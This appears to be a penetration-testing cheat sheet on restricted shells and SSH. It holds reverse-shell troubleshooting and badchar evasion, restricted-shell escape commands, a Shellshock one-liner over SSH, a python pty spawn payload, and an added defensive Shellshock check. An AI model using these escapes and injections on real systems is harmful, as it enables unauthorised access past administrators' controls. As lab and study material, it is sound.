Restricted Shell / SSH
If a reverse shell is not working:
    try changing the port to 443 or 80 (ports egress filtering usually allows)
    try checking for characters that break the reverse shell (badchars)
Evading badchars in a reverse shell (HTB Sense)
    Test which characters survive by echoing them back:
    echo abc
    echo abc/
    echo abc -
    Check the environment variables -> env
    HOME=/
    If a character is filtered, build it from an environment variable instead:
    echo ${HOME}/home
    Optional (use an ASCII/octal escape to produce the filtered character)
    printf "\55" -> -
Restricted reverse shell:
    Disable profiling in /etc/profile and ~/.profile
    Locate ifconfig (use the full path, since PATH may be restricted)
    /sbin/ifconfig
    nice /bin/bash
SSH:
Exploiting SSH via the Shellshock vulnerability in bash
    // Ways to start a shell without a profile
    ssh hostname -t "bash --noprofile"
    ssh -t user@host bash --norc --noprofile
    ssh -t user@host /bin/sh
    ssh -t user@host "bash --norc --noprofile -c '/bin/rm .bashrc'"

    // SSH bash shellshock (Troll2 Vulnhub)
    ssh -i noob user@host '() { :; }; uname -a'
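A defender-side check for the Shellshock bug that the SSH one-liner above depends on, added here as an example and not taken from the original cheat sheet: it runs the local bash with a crafted environment variable and reports whether the command appended to the function definition gets executed. It assumes a POSIX sh and a bash binary on PATH; the helper name shellshock_status is chosen here.

```shell
#!/bin/sh
# Added example (not from the original page): report whether the local bash
# still executes code appended to an environment-variable function definition,
# which is the bug the SSH shellshock one-liner above relies on. Run it on
# hosts that hand SSH sessions to bash to confirm the fix is actually installed.

shellshock_status() {
    # usage: shellshock_status [bash-binary]
    # prints "vulnerable", "patched" or "no-bash"; exit status 1, 0 or 2
    bash_bin="${1:-bash}"
    command -v "$bash_bin" >/dev/null 2>&1 || { echo "no-bash"; return 2; }
    # The variable body is a function definition followed by an extra command.
    # An unpatched bash runs that extra command while importing the function;
    # a patched bash ignores it (and only imports BASH_FUNC_* variables at all).
    out=$(env x='() { :; }; echo VULN' "$bash_bin" -c 'echo probe' 2>/dev/null)
    case "$out" in
        *VULN*) echo "vulnerable"; return 1 ;;
        *)      echo "patched";    return 0 ;;
    esac
}

# Stand-alone usage: print the verdict for the bash found on PATH.
shellshock_status
```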
Bypass restricted shell using: (dipak.pdf)
    export PATH=/bin/:/sbin/:/usr/bin/:$PATH
    payload = "python -c 'import pty;pty.spawn(\"/bin/bash\")'"